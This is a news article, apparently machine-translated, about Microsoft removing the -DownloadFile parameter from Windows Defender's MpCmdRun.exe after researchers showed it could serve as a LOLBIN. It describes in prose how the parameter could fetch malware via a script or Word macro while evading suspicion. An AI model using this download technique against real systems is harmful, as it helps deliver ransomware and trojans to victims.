A few weeks ago, Microsoft introduced a function in its Windows Defender antivirus that from the first moment it has called has generated a complete distrust on the part of security experts: the possibility of downloading files directly from the antivirus. Microsoft claimed that the function was secure, while all kinds of researchers have been proving otherwise. An attacker could take advantage of this feature to deliver malicious software to any computer remotely. And, therefore, finally Microsoft has decided to eliminate this function from its antivirus , at least for now.
One of the techniques most used by hackers to attack all types of computers is known as LOLBIN . This technique basically allows it to take advantage of legitimate operating system programs, such as Finger, or Windows Defender’s MpCmdRun tool, to carry out illegal activities such as stealing data or sending malware.
The new Windows Defender download feature came as the -DownloadFile parameter of the MpCmdRun.exe program. To this parameter we could add any URL and a path where to save the file and the executable would be in charge of downloading it and saving it on the computer.
It is very easy to use this command to download ransomware and Trojans. It is enough to execute a CMD command in a script or in a Word macro and our PC will already be compromised. And, although the antivirus should detect the threat if it is active, it may be that being a tool of the Windows system, and other security programs, they do not suspect it. And, in the end, is when our PC is put in danger.
Windows Defender no longer lets you download files
A few hours ago, Microsoft released a new silent update for its antivirus, 4.18.2009.2-0. This version basically what it has done has been to eliminate the possibility of using MpCmdRun.exe to download files. In other words, the DownloadFile parameter has been removed from the tool.
We do not need to do anything else. The antivirus is automatically updated on all computers that have it activated so that, for a few hours, there are no computers that can use this LOLBIN to download malicious software. Users who have not yet been connected to the Internet will download the new version of the antivirus as soon as they connect.
Does it make sense to download files from an antivirus?
We don’t know why Microsoft decided to release this feature. Windows Defender already has its own download and update engine , in addition to its system to send samples of dangerous files that are detected. Therefore, it is not necessary to have a parameter, in one of the antivirus executables, that allows us to download files from the Internet.
We don’t know why Microsoft chose to include this feature. Maybe he was preparing something else. Or you just want to add totally absurd, unnecessary and dangerous features to your security software. But, be that as it may, an antivirus does not have to have any component that allows downloading files. The simpler this type of software is, the better. The important thing is that it protects us properly.
